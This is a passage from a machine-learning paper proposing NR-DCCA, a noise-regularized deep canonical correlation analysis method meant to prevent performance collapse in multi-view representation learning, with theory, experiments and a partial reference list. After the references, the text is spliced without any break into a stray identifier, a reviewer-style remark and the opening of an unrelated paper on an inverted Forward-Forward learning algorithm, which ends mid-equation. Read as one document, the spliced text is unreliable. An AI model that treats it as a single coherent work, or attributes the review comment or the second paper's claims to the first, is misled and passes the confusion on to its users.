MDcR (Zhang et al., 2016a) maps each view to a lower-dimensional space and applies kernel matching to enforce dependencies across the views. CPM-Nets (Zhang et al., 2019a) formalizes the concept of partial MVRL, and many works have been proposed for this issue (Zhang et al., 2020; Tao et al., 2019; Li et al., 2022; Yin & Sun, 2021). AE²-Nets (Zhang et al., 2019b) utilizes a two-level autoencoder framework to obtain a comprehensive representation of multi-view data. DUA-Nets (Geng et al., 2021) takes a generative modeling perspective and dynamically estimates the weights for different views. MVTCAE (Hwang et al., 2021) explores MVRL from an information-theoretic perspective, capturing the shared and view-specific factors of variation by maximizing or minimizing specific total correlations. Our work focuses on CCA as a simple, classic, and theoretically sound approach, as it can still achieve state-of-the-art performance consistently.

2.2 CCA AND ITS VARIANTS

Canonical Correlation Analysis (CCA) projects the multi-view data into a unified space by maximizing their correlations (Hotelling, 1992; Horst, 1961; Hardoon et al., 2004; Lahat et al., 2015; Yan et al., 2023; Sun et al., 2023). It has been widely applied in various scenarios that involve multi-view data, including dimension reduction (Zhang et al., 2016b; Sun et al., 2010a; Avron et al., 2013), classification (Kim et al., 2007; Sun et al., 2010b), and clustering (Fern et al., 2005; Chang & Lin, 2011). To further enhance the nonlinear transformation ability of CCA, Kernel CCA (KCCA) uses kernel methods, while Deep CCA (DCCA) employs DNNs. Since DNNs are parametric and can take advantage of large amounts of data for training, numerous DCCA-based methods have been proposed. Benton et al. (2017) utilizes DNNs to optimize the objective of Generalized CCA, with the aim of revealing connections between multiple views more effectively. To better preserve view-specific information, Wang et al. (2015) introduces the reconstruction errors of autoencoders to DCCA. Going a step further, Wang et al. (2016) proposes Variational CCA and utilizes dropout and private autoencoders to project common and view-specific information into two distinct spaces. Furthermore, there are many studies exploring efficient methods for computing the correlations between multi-view data when dealing with more than two views, such as MCCA, GCCA, and TCCA (Horst, 1961; Nielsen, 2002; Kettenring, 1971; Hwang et al., 2021). Some research focuses on improving the efficiency of computing CCA by avoiding the need for singular value decomposition (SVD) (Chang et al., 2018; Chapman et al., 2022). However, the model collapse issue of DCCA-based methods has not been explored and addressed.

2.3 NOISE REGULARIZATION

Noise regularization is a pluggable approach to regularizing neural networks during training (Bishop, 1995; An, 1996; Sietsma & Dow, 1991; Gong et al., 2020). In supervised tasks, Sietsma & Dow (1991) might be the first to propose that, by adding noise to the training data, the model will generalize well on new unseen data. Moreover, Bishop (1995) and Gong et al. (2020) analyze the mechanism of noise regularization, and He et al. (2019) and Gong et al. (2020) indicate that noise regularization can also be used for adversarial training to improve the generalization of the network. In unsupervised tasks, Poole et al. (2014) systematically explores the role of noise injection at different layers in autoencoders, where distinct positions of noise perform specific regularization tasks.
However, how to make use of noise regularization for DCCA-based methods, especially for preventing model collapse, has not been studied.

3 PRELIMINARIES

In this section, we explain the objectives of MVRL and then introduce CCA and DCCA as representatives of the CCA-based methods and DCCA-based methods, respectively. Lastly, the model collapse issue in DCCA-based methods is demonstrated.

3.1 Settings for MVRL

Suppose the set of datasets from $K$ different sources that describe the same object is represented by $X$, and we define $X = \{X_1, \cdots, X_K\}$, $X_k \in \mathbb{R}^{d_k \times n}$, where $X_k$ represents the $k$-th view ($k$-th data source), $n$ is the sample size, and $d_k$ represents the feature dimension of the $k$-th view. We use $X_k^T$ to denote the transpose of $X_k$. The objective of MVRL is to learn a transformation function $\Psi$ that projects the multi-view data $X$ to a unified representation $Z \in \mathbb{R}^{m \times n}$, where $m$ represents the dimension of the representation space, as shown below:

$$Z = \Psi(X) = \Psi(X_1, \cdots, X_K).$$ (1)

After applying $\Psi$ for representation learning, we expect that the performance of using $Z$ would be better than directly using $X$ for various downstream tasks.

3.2 Canonical Correlation Analysis

Among various MVRL methods, CCA projects the multi-view data into a common space by maximizing their correlations. We first define the correlation between two views as follows:

$$\text{Corr}(W_1X_1, W_2X_2) = \text{tr}\left(\left((\Sigma_{11}^{-1/2}\Sigma_{12}\Sigma_{22}^{-1/2})'(\Sigma_{11}^{-1/2}\Sigma_{12}\Sigma_{22}^{-1/2})\right)^{1/2}\right)$$ (2)

where $\text{tr}$ denotes the matrix trace, $\Sigma_{11}$, $\Sigma_{22}$ represent the self-covariance matrices of the projected views, and $\Sigma_{12}$ is the cross-covariance matrix between the projected views (D'Agostini, 1994; Andrew et al., 2013). The correlation between the two projected views can be regarded as the sum of all singular values of the normalized cross-covariance (Hotelling, 1992; Anderson et al., 1958). For multiple views, their correlation is defined as the summation of all the pairwise correlations (Nielsen, 2002; Kettenring, 1971), which is shown as follows:

$$\text{Corr}(W_1X_1, \cdots, W_kX_k, \cdots, W_KX_K) = \sum_{k<j} \text{Corr}(W_kX_k, W_jX_j).$$ (3)

Essentially, CCA searches for the linear transformation matrices $\{W_k\}_k$ that maximize the correlation among all the views. Mathematically, it can be represented as:

$$\{W_k^*\}_k = \arg\max_{\{W_k\}_k} \text{Corr}(W_1X_1, \cdots, W_kX_k, \cdots, W_KX_K).$$ (4)

Once $W_k^*$ is obtained, the multi-view data are projected into a unified space. Lastly, all projected data are concatenated to obtain $Z = [W_1^*X_1; \cdots; W_K^*X_K]$ for downstream tasks.

3.3 DCCA

On top of CCA, DCCA integrates neural networks and CCA to capture the nonlinear relationships among multi-view data. The major difference in DCCA is that the transformation matrix $W_k$ is replaced with a multi-layer perceptron (MLP), and the parameters of the MLP are updated through backpropagation (Andrew et al., 2013). Specifically, each $W_k$ is replaced with a neural network $f_k$, which can be viewed as a nonlinear transformation. Similar to CCA, the goal of DCCA is to solve the following optimization problem:

$$\{f_k^*\}_k = \arg\max_{\{f_k\}_k} \text{Corr}(f_1(X_1), \cdots, f_k(X_k), \cdots, f_K(X_K)).$$ (5)

Again, the unified representation is obtained as $Z = [f_1^*(X_1); \cdots; f_k^*(X_k); \cdots; f_K^*(X_K)]$ for downstream tasks.
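For reference, a minimal NumPy sketch of Eqs. 2–3 follows; the small ridge term `eps` is an implementation detail we add for numerical stability and is not part of the formulation:

```python
import numpy as np

def corr(Y1, Y2, eps=1e-8):
    """Eq. 2: sum of singular values of the normalized cross-covariance
    of two zero-centered views of shape (d_k, n)."""
    n = Y1.shape[1]
    Y1 = Y1 - Y1.mean(axis=1, keepdims=True)
    Y2 = Y2 - Y2.mean(axis=1, keepdims=True)
    S11 = Y1 @ Y1.T / (n - 1) + eps * np.eye(Y1.shape[0])
    S22 = Y2 @ Y2.T / (n - 1) + eps * np.eye(Y2.shape[0])
    S12 = Y1 @ Y2.T / (n - 1)

    def inv_sqrt(S):                      # S^{-1/2} via eigendecomposition
        w, U = np.linalg.eigh(S)
        return U @ np.diag(w ** -0.5) @ U.T

    T = inv_sqrt(S11) @ S12 @ inv_sqrt(S22)
    return np.linalg.svd(T, compute_uv=False).sum()

def total_corr(views):
    """Eq. 3: sum of pairwise correlations over the K projected views."""
    K = len(views)
    return sum(corr(views[k], views[j])
               for k in range(K) for j in range(k + 1, K))
```

The same `total_corr` quantity is the objective maximized in Eqs. 4 and 5, with the views given by $W_kX_k$ or $f_k(X_k)$, respectively.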
3.4 Model Collapse of DCCA

Despite exhibiting promising performance, DCCA shows a significant decline in performance as training proceeds. We refer to this decline-in-performance phenomenon as model collapse. Model collapse could make the performance of DCCA-based methods even worse than that of classic CCA methods and simple feature concatenation. As illustrated in (a) of Figure 4, one can see that the performance of DCCA drops drastically during training, though its best performance at early iterations could exceed that of CCA. The correlation between unrelated data increases as the collapsed model transforms any data to a degenerate feature space. In (b) of Figure 4, we can see that, except for the proposed method (NR-DCCA), the correlation between unrelated data increases significantly. We can also analyze model collapse on real-world data by feature visualization, as shown in Figure 9 in Appendix A.9. However, it should be noted that the full-rank property of the representation always holds for DCCA (verified in Appendix A.6.1), while this cannot prevent model collapse. Indeed, the model collapse of DCCA is mainly due to the difference between $W_k$ and $f_k$, which requires further investigation.

4 DCCA WITH NOISE REGULARIZATION (NR-DCCA)

4.1 Method

In this section, we present NR-DCCA, which makes use of the noise regularization approach to prevent model collapse in DCCA. Indeed, the developed noise regularization approach can be applied to variants of DCCA, such as Deep Generalized CCA (DGCCA) (Benton et al., 2017). An overview of the NR-DCCA framework is presented in Figure 2.

Figure 2: Illustration of NR-DCCA.

We take the CUB dataset as an example: similar to DCCA, the $k$-th view $X_k$ is transformed using $f_k$ to obtain the new representation $f_k(X_k)$, and the correlation between the new representations is maximized. Additionally, for the $k$-th view, we incorporate the proposed NR loss to regularize $f_k$. The key idea in NR-DCCA is to generate a set of i.i.d. Gaussian white noise, denoted as $A = \{A_1, \cdots, A_k, \cdots, A_K\}$, $A_k \in \mathbb{R}^{d_k \times n}$, with the same shape as the multi-view data $X_k$. In CCA, the correlation with noise is invariant to the full-rank linear transformation $W_k$: $\text{Corr}(X_k, A_k) = \text{Corr}(W_k X_k, W_k A_k)$ (rigorous proof provided in Proposition 3). However, for DCCA, $\text{Corr}(X_k, A_k)$ might not equal $\text{Corr}(f_k(X_k), f_k(A_k))$, because the powerful neural networks $f_k$ have overfitted to the maximization problem in DCCA and "created" correlation themselves. Therefore, we enforce DCCA to mimic the behavior of CCA by adding an NR loss $\zeta_k = |\text{Corr}(f_k(X_k), f_k(A_k)) - \text{Corr}(X_k, A_k)|$, and hence the formulation of NR-DCCA is:

$$\{f^*_k\}_k = \arg \max_{\{f_k\}_k} \text{Corr}(f_1(X_1), \cdots, f_K(X_K)) - \alpha \sum_{k=1}^{K} \zeta_k.$$ (6)

where $\alpha$ is the hyper-parameter weighing the NR loss. NR-DCCA can be trained through backpropagation with the randomly generated $A$ in each epoch, and the unified representation is obtained directly using $\{f^*_k\}_k$ in the same manner as DCCA.

4.2 Theoretical analysis

In this section, we provide the rationale for why the developed noise regularization can help to prevent model collapse. Without loss of generality, we assume that all the datasets $X_k$ are zero-centered with respect to rows (Hotelling, 1992).
Then we make use of the following proposition to simplify our analysis:

**Proposition 1** Given a specific matrix \( B \) and a matrix \( C \) that is zero-centered with respect to rows, the product \( BC \) is also zero-centered with respect to rows.

This implies that \( W_k A_k \) and \( W_k X_k \) are both zero-centered matrices. When computing the covariance matrix, there is no need for an additional subtraction of the row mean, which simplifies our subsequent derivations. We first analyze CCA in detail; the Moore-Penrose Inverse (MPI) (Petersen et al., 2008) will be used for the analysis, and the MPI is defined as follows:

**Definition 1** Given a specific matrix \( Y \), its Moore-Penrose Inverse (MPI) is denoted as \( Y^+ \). \( Y^+ \) satisfies: \( YY^+ Y = Y \), \( Y^+ YY^+ = Y^+ \), \( YY^+ \) is symmetric, and \( Y^+ Y \) is symmetric.

The MPI \( Y^+ \) is unique and always exists for any \( Y \). Furthermore, when the matrix \( Y \) is invertible, its inverse matrix \( Y^{-1} \) is exactly \( Y^+ \). Using the definition of the MPI, we can rewrite the formulation of CCA. In particular, \( \text{Corr}(\cdot, \cdot) \) can be derived by replacing the inverse with the MPI. Using \( \text{Corr}(X_k, A_k) \) as an example, the following proposition holds:

**Proposition 2 (MPI-based CCA)** For the \( k \)-th view data \( X_k \) and the Gaussian white noise \( A_k \), we have
\[
\text{Corr}(X_k, A_k) = \frac{1}{(n-1)^2} \text{tr}(A_k^+ A_k X_k^+ X_k)^{1/2}, \forall k.
\]

Utilizing this new form of \( \text{Corr} \), we discover that the transformation matrix \( W_k \) obtained from multi-view data \( X = \{X_1, \cdots, X_k, \cdots, X_K\} \), \( X_k \in \mathbb{R}^{d_k \times n} \), through CCA possesses the following properties:

**Proposition 3** For any \( k \), if \( W_k \) is a square and full-rank matrix, the correlation between \( X_k \) and \( A_k \) remains unchanged before and after the transformation by \( W_k \). Mathematically, we have \( \text{Corr}(X_k, A_k) = \text{Corr}(W_k X_k, W_k A_k) \).

**Proposition 4** For any \( k \), if \( \text{Corr}(W_k X_k, W_k A_k) = \text{Corr}(X_k, A_k) \) and \( W_k \) is a square matrix, then \( W_k \) must be a full-rank matrix.

Proofs of all the above propositions are presented in the Appendix. Combining Propositions 3 and 4, we obtain Theorem 1.

**Theorem 1 (Full-rank of CCA)** If \( W_k \) is a square matrix for any \( k \), then \( \eta_k = 0 \iff W_k \) is full-rank, where \( \eta_k = |\text{Corr}(W_k X_k, W_k A_k) - \text{Corr}(X_k, A_k)| \).

It is widely acknowledged that, forced by the loss function, CCA searches for a full-rank representation \( W_k X_k \) and thereby obtains a full-rank matrix \( W_k \) (refer to Lemma 2 in Appendix A.3). However, Theorem 1 is profound, as it provides, for the first time, an equivalent condition for the full-rank property of \( W_k \) by connecting it to the correlation with noise; we can then transplant this condition to DCCA. Essentially, CCA searches for \( W_k \) as a full-rank matrix, and it is robust to random noise \( A_k \), given that the correlation between \( X_k \) and \( A_k \) is invariant to the transformation \( W_k \). This indicates that \( W_k \) will not learn to "create" correlation during the maximization process. However, the correlation increases during DCCA training, which is closely related to model collapse.
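Propositions 3 and 4 can be checked numerically by reusing the `corr()` sketch from Section 3; the nonlinear map `f_k` below is a toy stand-in for a trained network rather than the architecture used in our experiments:

```python
rng = np.random.default_rng(0)
d, n = 8, 500
X_k = rng.standard_normal((d, n))      # zero-mean view data
A_k = rng.standard_normal((d, n))      # Gaussian white noise of the same shape
W_k = rng.standard_normal((d, d))      # square; full-rank with probability 1

base = corr(X_k, A_k)
# Proposition 3: a full-rank square W_k leaves Corr unchanged (up to eps).
print(abs(corr(W_k @ X_k, W_k @ A_k) - base))  # ~0

# NR loss zeta_k of Eq. 6 for a toy nonlinear, rank-reducing map f_k:
f_k = lambda Y: np.tanh(W_k @ Y)[:4]   # keep only 4 of the 8 output rows
zeta_k = abs(corr(f_k(X_k), f_k(A_k)) - base)  # generally nonzero
```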
We would like DCCA to hold the same property as CCA; therefore, we define the "full-rank" property for the neural network \( f_k \):

**Definition 2 ("Full-rank" of \( f_k \))** Given \( k \), the neural network \( f_k \) is called "full-rank" if \( \zeta_k = 0 \).

Based on Definition 2, the proposed NR-DCCA maximizes the correlation among views and also enforces the neural network to be "full-rank". As the neural network \( f_k \) shares the same property as the full-rank matrix \( W_k \), the model collapse issue can be eliminated. It should be noted that the "full-rank" property of \( f_k \) is different from the full-rank property of the representation \( f_k(X_k) \): the latter is defined by the matrix rank, while the former is a new concept introduced in this paper, defined by \( \zeta_k = 0 \).

5 Numerical Experiments

We conduct extensive experiments on both synthetic and real-world datasets to answer the following research questions:

- **RQ1:** How can we construct synthetic datasets to evaluate the MVRL methods in a comprehensive manner?
- **RQ2:** Does NR-DCCA avoid model collapse across all synthetic MVRL datasets?
- **RQ3:** Does NR-DCCA perform consistently in real-world datasets?

We follow the protocol described in Hwang et al. (2021) for evaluating the MVRL methods. For each dataset, we construct a train dataset and a test dataset. All methods are trained in an unsupervised manner on the train dataset. Subsequently, the test dataset is used to obtain the representation, which will be evaluated in downstream tasks. For the regression task, we employ Ridge Regression (Hoerl & Kennard, 1970) and use $R^2$ as the evaluation metric. For the classification task, we use a Support Vector Classifier (SVC) (Chang & Lin, 2011) and report the average F1 scores. All tasks are evaluated using 5-fold cross-validation, and the reported results correspond to the average values of the respective metrics. Baseline methods include CONCAT, CCA (Hotelling, 1992), PRCCA (Tuzhilina et al., 2023), KCCA (Akaho, 2006), DCCA (Andrew et al., 2013), DGCCA (Benton et al., 2017), DCCAE/DGCCAE (Wang et al., 2015), DCCA_PRIVATE/DGCCA_PRIVATE (Wang et al., 2016), and MVTCAE (Hwang et al., 2021). Details of the experiment settings, including datasets and baselines, are presented in Appendix A.5. Hyper-parameter settings, including ridge regularization and the $\alpha$ of NR, are discussed in Appendix A.6. We also analyze the computational complexity of different DCCA-based methods in Appendix A.8, and the learned representations are visualized in Appendix A.9. In the main paper, we mainly compare DCCA and NR-DCCA, while the results related to DGCCA are similar and presented in Appendix A.10.

5.1 Construction of Synthetic Datasets (RQ1)

We construct synthetic datasets to assess the performance of MVRL methods, and the framework is illustrated in Figure 3. We assume that the multi-view data describe the same object, which is represented by a high-dimensional embedding $G \in \mathbb{R}^{d \times n}$, where $d$ is the feature dimension and $n$ is the size of the data; we call it the God Embedding. Each view of the data is regarded as a non-linear transformation of part (or all) of $G$. For example, we choose $K = 2$, $d = 100$, and then $X_1 = \phi_1(G[0 : 50 + CR/2, :])$, $X_2 = \phi_2(G[50 - CR/2 : 100, :])$, where $\phi_1$ and $\phi_2$ are non-linear transformations, and $CR$ is referred to as the common rate.
The common rate is defined as follows:

**Definition 3 (Common Rate)** For two-view data $X = \{X_1, X_2\}$, the common rate is defined as the percentage overlap of the features in $X_1$ and $X_2$ that originate from $G$.

One can see that the common rate ranges from 0% to 100%. The larger the value, the greater the correlation between the two views, and a value of 0 indicates that the two views do not share any common dimensions of $G$. Additionally, we construct the downstream tasks by directly transforming the God Embedding $G$. Each task $T_j = \psi_j(G)$, where $\psi_j$ is a transformation and $T_j$ represents the $j$-th task. By setting different $G$, common rates, $\phi_k$, and $\psi_j$, we can create various synthetic datasets to evaluate the MVRL methods. Finally, only the $X_k$ are observable to the MVRL methods for learning the representation, and the learned representation is used to classify/regress $T_j$ to examine the performance of each method. Detailed implementation is given in Appendix A.7.

5.2 Performance on Synthetic Datasets (RQ2)

We generate synthetic datasets with different common rates and compare the proposed NR-DCCA against the baseline methods, as presented in Figure 4(a). The values depicted in the figure represent the mean and standard deviation of the performance of the methods across datasets. One can see that the DCCA-based methods (e.g., DCCA, DCCAE, DCCA_PRIVATE) encounter model collapse during training, and the variance of their accuracy also increases. CCA-based methods (CCA and KCCA) demonstrate stable performance, but their best accuracy is not as good as that of the DCCA-based methods. Our proposed NR-DCCA achieves state-of-the-art performance as well as the training stability needed to prevent model collapse.

Figure 3: Construction of a synthetic dataset. This example consists of 2 views and $n$ objects, and the common rate is 0%.

Figure 4: (a) Mean and standard deviation of the CCA-based method performance across synthetic datasets at different training epochs. (b) The correlation between noise and real data after transformation, varying with epochs under different common rate settings for CCA-based methods.

Moreover, according to our analysis, the correlation should be invariant if the neural networks hold the “full-rank” property. So, after training DCCA, DGCCA, and their NR-variants, we utilize the trained encoders to project the corresponding view data and randomly generated Gaussian white noise, and then compute their correlation, as shown in Figure 4(b); a code sketch of this diagnostic is given below, after Figure 5. It can be observed that, except for our method (NR-DCCA), all methods increase the correlation between unrelated data as training progresses. It should be noted that this phenomenon occurs under all common rates.

The performance under different common rates is inspected separately, as presented in Figure 5. The results at the final epoch are also presented in Table 2 in Appendix A.11. Overall, all methods demonstrate improving performance as the common rate increases. DCCA-based methods can achieve performance similar to NR-DCCA, but they collapse drastically as training proceeds. NR-DCCA consistently outperforms the other methods throughout training.

Figure 5: Performance of different methods with respect to data with different common rates during training. Each column represents the testing accuracy of the method at a specific training epoch.
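For completeness, the diagnostic behind Figure 4(b) can be sketched as follows, reusing the `mpi_corr` routine sketched earlier; the encoder call convention (samples in rows) is an assumption for illustration.

```python
import numpy as np
import torch

def collapse_gap(f_k, X_k, rng):
    """|Corr(f(X), f(A)) - Corr(X, A)| for Gaussian white noise A.

    X_k: (d_k, n) row-centered view data; f_k: a trained torch encoder
    taking (n, d_k) inputs. A growing gap over epochs signals collapse.
    """
    A = rng.standard_normal(X_k.shape)
    A -= A.mean(axis=1, keepdims=True)
    with torch.no_grad():
        ZX = f_k(torch.as_tensor(X_k.T, dtype=torch.float32)).numpy().T
        ZA = f_k(torch.as_tensor(A.T, dtype=torch.float32)).numpy().T
    ZX -= ZX.mean(axis=1, keepdims=True)   # re-center rows before Corr
    ZA -= ZA.mean(axis=1, keepdims=True)
    return abs(mpi_corr(ZX, ZA) - mpi_corr(X_k, A))
```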
An interesting observation is that most CCA-based methods perform better on data with high common rates, consistent with CCA’s assumption of maximizing the correlation between data from different views. However, this also indicates that their performance may degrade when correlations among views are low.

5.3 Consistent Performance on Real-world Datasets (RQ3)

We further conduct experiments on three real-world datasets: PolyMnist (Sutter et al., 2021), CUB (Wah et al., 2011), and Caltech (Deng et al., 2018). Additionally, we use different numbers of views in PolyMnist. The results are presented in Figure 6, and the performance at the final epoch in the figure is presented in Table 2 in Appendix A.11. Generally, the proposed NR-DCCA demonstrates competitive and stable performance. In contrast to the synthetic data, the CCA-based methods underperform the DCCA-based methods, which might be due to the complex nature of real-world views. However, the DCCA-based methods still exhibit varying degrees of collapse as the number of epochs increases. It is noteworthy that on the PolyMnist dataset, as the number of views increases, model collapse becomes more severe for DCCA-based methods, while our NR-DCCA further improves its performance.

Figure 6: Performance of different methods on real-world datasets. Each column represents the performance on a specific dataset. The number of views in the dataset is denoted in parentheses next to the dataset name.

6 Conclusions

We propose a novel noise regularization approach for DCCA in the context of MVRL, which prevents model collapse during training, an issue observed and analyzed in this paper for the first time. Specifically, we theoretically analyze the full-rank property in CCA and demonstrate that it is the key to preventing model collapse. To this end, an analogous “full-rank” property is defined for DCCA, and the noise regularization can be considered an implicit constraint that makes the neural networks “full-rank”. Additionally, synthetic datasets with different common rates are generated and tested, providing a benchmark for fair and comprehensive comparisons of different MVRL methods. The NR-DCCA developed in this paper inherits the merits of both CCA and DCCA to achieve stable and consistently strong performance on both synthetic and real-world datasets. More importantly, the proposed noise regularization approach can also be generalized to other DCCA-based methods (e.g., DGCCA).

In future studies, we wish to explore the potential of noise regularization in other representation learning tasks, such as contrastive learning and generative models. It is also interesting to further investigate the “full-rank” definition for neural networks and how it differs from other neural network regularization approaches, such as orthogonalization (Bansal et al., 2018; Huang et al., 2020) and weight decay (Loshchilov & Hutter, 2017; Zhang et al., 2018; Krogh & Hertz, 1991). Additionally, it is interesting but challenging to investigate what (e.g., parameters, gradients, features) the neural network regularizes through the noise, and how. Our ultimate goal is to make the developed noise regularization a pluggable and useful module for neural network regularization.

REPRODUCIBILITY STATEMENT

All of our experiments are conducted with fixed random seeds, and all reported downstream-task performance is the average of 5-fold cross-validation.
The CCA-zoo package is adopted as the implementation of the various CCA/GCCA-based methods, and the original implementation of MVTCAE is employed. Both the baselines and our developed NR-DCCA/NR-DGCCA are implemented in the same PyTorch environment (see requirements.txt in the source code). All the datasets used in the paper are either provided or open datasets. Detailed proofs of all the propositions in the main paper can be found in the Appendix. Both the source code and the appendix can be downloaded from the supplementary material.

REFERENCES

Shotaro Akaho. A kernel method for canonical correlation analysis. arXiv preprint cs/0609071, 2006.

Guozhong An. The effects of adding noise during backpropagation training on a generalization performance. Neural Computation, 8(3):643–674, 1996.

Theodore Wilbur Anderson. An Introduction to Multivariate Statistical Analysis, volume 2. Wiley, New York, 1958.

Galen Andrew, Raman Arora, Jeff Bilmes, and Karen Livescu. Deep canonical correlation analysis. In International Conference on Machine Learning, pp. 1247–1255. PMLR, 2013.

Haim Avron, Christos Boutsidis, Sivan Toledo, and Anastasios Zouzias. Efficient dimensionality reduction for canonical correlation analysis. In International Conference on Machine Learning, pp. 347–355. PMLR, 2013.

Nitin Bansal, Xiaohan Chen, and Zhangyang Wang. Can we gain more from orthogonality regularizations in training deep networks? Advances in Neural Information Processing Systems, 31, 2018.

Adrian Benton, Huda Khayrallah, Biman Gujral, Dee Ann Reisinger, Sheng Zhang, and Raman Arora. Deep generalized canonical correlation analysis. arXiv preprint arXiv:1702.02519, 2017.

Christopher M Bishop. Training with noise is equivalent to Tikhonov regularization. Neural Computation, 7(1):108–116, 1995.

Chih-Chung Chang and Chih-Jen Lin. LIBSVM: a library for support vector machines. ACM Transactions on Intelligent Systems and Technology (TIST), 2(3):1–27, 2011.

Xiaobin Chang, Tao Xiang, and Timothy M Hospedales. Scalable and effective deep CCA via soft decorrelation. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 1488–1497, 2018.

James Chapman and Hao-Ting Wang. CCA-Zoo: A collection of regularized, deep learning based, kernel, and probabilistic CCA methods in a scikit-learn style framework. Journal of Open Source Software, 6(68):3823, 2021.

James Chapman, Ana Lawry Aguila, and Lennie Wells. A generalized eigengame with extensions to multiview representation learning. arXiv preprint arXiv:2211.11323, 2022.

Giulio D’Agostini. On the use of the covariance matrix to fit correlated data. Nuclear Instruments and Methods in Physics Research Section A: Accelerators, Spectrometers, Detectors and Associated Equipment, 346(1-2):306–311, 1994.

K. Deepak, G. Srivathsan, S. Roshan, and S. Chandrakala. Deep multi-view representation learning for video anomaly detection using spatiotemporal autoencoders. Circuits, Systems, and Signal Processing, 40(2), 2021.
6bAfAcuuZD
Secondly, the loss function requires an explicit positive/negative cue ($\eta$). Historically, this sort of global signal has been contentious in computational models. It may be worth emphasizing that this error signal is a single scalar, and explaining how it may be much more easily realized than a global vector-valued error/target signal.
EMERGENCE OF SURPRISE AND PREDICTIVE SIGNALS FROM LOCAL CONTRASTIVE LEARNING

Anonymous authors
Paper under double-blind review

ABSTRACT

Hierarchical predictive models are a popular view of cortical representations, and may hold promise for enhancing the robustness and generalization of machine learning architectures. These models exploit the local computation of predictive signals to pass information, but their manifestation in neurobiology remains actively debated. This paper contributes a principled approach to this discussion by investigating the inverted Forward-Forward Algorithm, a biologically plausible approach to learning with only forward passes. We demonstrate that hierarchical predictive signatures can emerge from a parsimonious combination of contrastive learning and learned cancellation that shape the network’s representation across layers. We identify similarities between our model and hierarchical predictive coding, and characterize the emergent properties of the resulting representations. These properties of the inverted FF model present falsifiable predictions which may be accessible in emerging experiments. This work advances the hypothesis that the computational properties which emerge in neocortical circuits, widely acknowledged as the basis of human intelligence, may be attributed to parsimonious, local learning principles.

1 INTRODUCTION

The neocortex contains hierarchically layered circuits with rich feedforward and feedback connections (Chaudhuri et al., 2015; Bassett & Sporns, 2017; Siegle et al., 2021). The feedforward (or bottom-up) pathway involves the transfer of information from lower-level sensory areas to higher-level association areas, leading to the extraction of input-specific features. In contrast, the feedback (or top-down) pathway aids in the integration of high-level information by relaying signals from higher-level areas to lower-level ones. Though often assumed to propagate learning-related errors (LeCun et al., 2015), the functional role of feedback connections has been implicated in many different perceptual and cognitive abilities such as attention, efference copies, and memory retrieval (Mechelli et al., 2004; Gilbert & Li, 2013). In the Bayesian view of cortical feedback, the bidirectional flow of information enables the integration of ongoing sensory inputs with existing cortical representations of prior contextual information (Badre & Nee, 2018; Khan & Hofer, 2018; Froudarakis et al., 2019).

A specific way to convey such contextual information is through surprise- and familiarity-based signals. When incoming sensory input corresponds to expectations, the surprise signal is minimal. When the input deviates from expectations, the surprise signal rises, indicating novelty or unfamiliarity. It has been shown that novel stimuli elicit increased neural activities that decrease over repeated presentations (Garrett et al., 2023; Piet et al., 2023). Such surprise signals contain information for the brain to improve its internal model of the external world, which leads to more refined and accurate expectations that can direct behavior (Wolpert et al., 1998; Kawato, 1999; Schenck, 2008). However, the mechanisms through which feedforward and feedback connections interact and generate such surprise signals are not well understood.
An influential theory in neuroscience, predictive coding (Rao & Ballard, 1999; Jiang & Rao, 2022), postulates that feedback circuits deliver top-down spatiotemporal predictions of lower-level neural activities, while feedforward circuits send bottom-up prediction errors (surprises) to higher levels. Despite its popularity, minimizing prediction error is an iterative process based on gradient descent, which requires physical time for convergence and implies symmetry between the feedback and feedforward synaptic weights, limiting its biological plausibility. Additionally, computing the prediction error requires a one-to-one correspondence between the predictive neurons and error neurons, which has not been confirmed experimentally (Jordan & Keller, 2020).

Figure 1: Simple illustrations representing the model architecture and learning scheme. (a) Model architecture, where data inputs are clamped to the bottom and label inputs are clamped to the top of the network. (b) Forward-Forward contrastive learning schematic with the definition of positive and negative datasets, where the label mismatches or matches the sensory input. (c) Learning scheme of the model, where the training phase proceeds in two steps: the presentation and processing phases, respectively. In the processing phase, positive data should have low activity, whereas negative data should have high activity.

Here, we present a simple and biologically plausible mechanism that captures the spatiotemporal predictive nature of cortical processing without generating explicit predictions. Our model is based on the Forward-Forward model (Hinton, 2022), a recently introduced form of contrastive learning. We inverted the original Forward-Forward objective to minimize the activity of positive training data and maximize the activity of negative training data, where we now refer to the level of activity as surprise. Such an objective promotes activity cancellation when top-down labels match bottom-up sensory input. As a consequence, different layers across the hierarchy learn to predict each other’s activity to enable such minimization (or cancellation) of activities. Our most significant contributions are:

• we demonstrate that our model reproduces both hierarchical and temporal properties of predictive computations by generating information flows that lead to surprise and cancellation signals (Secs. 3.1 to 3.2);

• we illustrate a mechanistic understanding of the emergence of such information fluxes by tracing their origin to the circuit’s ability to implement spatiotemporal cancellation across layers of activity (Secs. 3.2 to 3.3);

• we establish an equivalence between our contrastive learning rule and a distinctive three-factor Hebbian plasticity, showcasing strong connections (and differences) to predictive coding. This finding emphasizes the biological plausibility of our model, characterized by online capability, no weight transport, and the integration of local signals with a global signal (Sec. 3.5).

These results demonstrate that the application of a fundamental contrastive learning technique that integrates surprise and cancellation dynamics generates predictive spatiotemporal properties. This suggests that these properties, which are generally regarded as distinctive characteristics of neocortical computations, can be generated by simple, locally-defined learning principles.
2 MODEL ARCHITECTURE AND LEARNING SCHEME

We extend the Forward-Forward model (Hinton, 2022; Ororbia & Mali, 2023; Ororbia, 2023), a backpropagation-free learning paradigm regarded as a form of contrastive learning. Our model consists of a hierarchical network with multiple layers, with label information clamped at the top and input at the bottom (Fig. 1a). The label in this architecture is thought of as a second input, and the output of the network is its magnitude of activity. The activity magnitude serves as an indication of how well the label input (clamped at the top) matches the supplied data input (clamped at the bottom). Additionally, the network operates in the time domain, where the activities of each layer are updated based on the activities of adjacent layers at the previous timestep. The information flow of the input is considered bottom-up, whereas the information flow of the label is considered top-down. Neurons in each layer receive presynaptic input from a lower layer, a higher layer, and themselves at the previous timestep. For layers at the bottom and top of the network, where there is no layer below or above, the presynaptic input is taken from the data input or label input respectively.

The training process involves defining positive and negative datasets. Positive (negative) data is one in which the label and input do (not) match. For the negative dataset, the activity of each layer is increased, which can be thought of as an indication of surprise (Fig. 1b). For the positive dataset, the activity is diminished, resulting in decreased surprise. In this network, each layer acts as its own learning agent based on its 3 inputs (top-down, bottom-up, lateral) to produce a level of activity representative of whether the data input matches the label input, even if the data and label inputs are not directly adjacent to the layer itself. The learning objective is defined in terms of the individual layer activations at each time \( x_{\text{layer}}(t') \):

\[
